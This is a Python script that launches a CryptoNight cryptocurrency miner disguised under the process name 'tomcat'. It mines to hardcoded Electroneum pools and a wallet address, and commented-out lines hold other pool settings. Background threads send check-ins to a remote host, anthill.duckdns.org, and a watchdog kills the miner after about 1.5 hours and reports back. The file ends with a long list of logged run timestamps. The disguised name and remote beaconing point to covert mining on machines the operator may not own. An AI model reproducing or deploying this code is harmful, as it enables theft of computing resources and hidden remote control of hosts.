import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:06.899704
#2018-02-17 16:59:04.316395
#2018-02-17 18:47:07.162885
#2018-02-17 20:36:06.330077
#2018-02-17 22:22:05.752263
#2018-02-18 00:06:01.823849
#2018-02-18 01:57:04.599881
#2018-02-18 03:45:05.524384
#2018-02-18 05:33:01.867787
#2018-02-18 07:24:07.231705
#2018-02-18 09:12:06.589326
#2018-02-18 10:57:07.350469
#2018-02-18 12:44:07.898576
#2018-02-18 14:34:07.320588
#2018-02-18 16:24:07.866257
#2018-02-18 18:13:01.791767
#2018-02-18 19:58:06.028601
#2018-02-18 21:45:04.582140
#2018-02-18 23:34:03.966142
#2018-02-19 01:20:04.480976
#2018-02-19 03:08:04.392232
#2018-02-19 04:53:07.190202
#2018-02-19 06:39:01.823185
#2018-02-19 08:29:01.825711
#2018-02-19 10:18:04.522948
#2018-02-19 12:06:07.638980
#2018-02-19 13:54:08.272687
#2018-02-19 15:42:02.006313
#2018-02-19 17:29:05.593814
#2018-02-19 19:17:05.259145
#2018-02-19 21:04:06.555444
#2018-02-19 22:51:06.480369
#2018-02-20 00:35:04.609855
#2018-02-20 02:23:07.698671
#2018-02-20 04:13:06.502888
#2018-02-20 05:56:05.117206
#2018-02-20 07:42:07.951515
#2018-02-20 09:27:01.656431
#2018-02-20 11:11:05.417854
#2018-02-20 12:57:08.718246
#2018-02-20 14:41:01.303752
#2018-02-20 16:26:04.899670
#2018-02-20 18:12:06.543202
#2018-02-20 20:05:01.295242
#2018-02-20 21:51:04.100253
#2018-02-20 23:33:08.145241
#2018-02-21 02:13:02.027604
#2018-02-21 03:59:05.547660
#2018-02-21 05:46:07.724692
#2018-02-21 07:34:13.723816
#2018-02-21 09:19:07.748701
#2018-02-21 11:08:07.161005
#2018-02-21 12:55:09.057031
#2018-02-21 14:42:08.463981
#2018-02-21 16:29:04.562985
#2018-02-21 18:20:01.475099
#2018-02-21 20:05:05.345228
#2018-02-21 21:52:06.741405
#2018-02-21 23:40:10.303296
#2018-02-22 01:30:01.604373
#2018-02-22 03:18:01.364548
#2018-02-22 05:05:04.279109
#2018-02-22 06:48:07.079891
#2018-02-22 08:36:07.500557
#2018-02-22 10:23:05.982742
#2018-02-22 12:08:06.508354
#2018-02-22 13:53:05.612511
#2018-02-22 15:40:08.878341
#2018-02-22 17:25:13.450505
#2018-02-22 19:12:11.195612
#2018-02-22 21:04:01.820378
#2018-02-22 22:48:05.952509
#2018-02-23 00:34:06.908316
#2018-02-23 02:20:01.648863
#2018-02-23 04:07:06.081182
#2018-02-23 05:54:06.531554
#2018-02-23 07:44:05.525968
#2018-02-23 10:07:08.236148
#2018-02-23 11:59:11.120081
#2018-02-23 13:48:12.148864
#2018-02-23 15:39:05.654482
#2018-02-23 17:26:08.797234
#2018-02-23 19:13:05.338032
#2018-02-23 20:57:01.535273
#2018-02-23 22:44:04.394910
#2018-02-24 00:32:02.252074
#2018-02-24 02:25:07.955233
#2018-02-24 04:16:05.435230
#2018-02-24 06:04:01.936688
#2018-02-24 07:51:07.352480
#2018-02-24 09:35:01.594149
#2018-02-24 11:29:04.488641
#2018-02-24 13:18:07.999750
#2018-02-24 15:09:01.712659
#2018-02-24 16:57:06.198153
#2018-02-24 18:44:07.513837
#2018-02-24 20:34:06.407175
#2018-02-24 22:36:04.189690
#2018-02-25 01:44:03.746084
#2018-02-25 05:08:05.012218
#2018-02-25 10:23:01.779401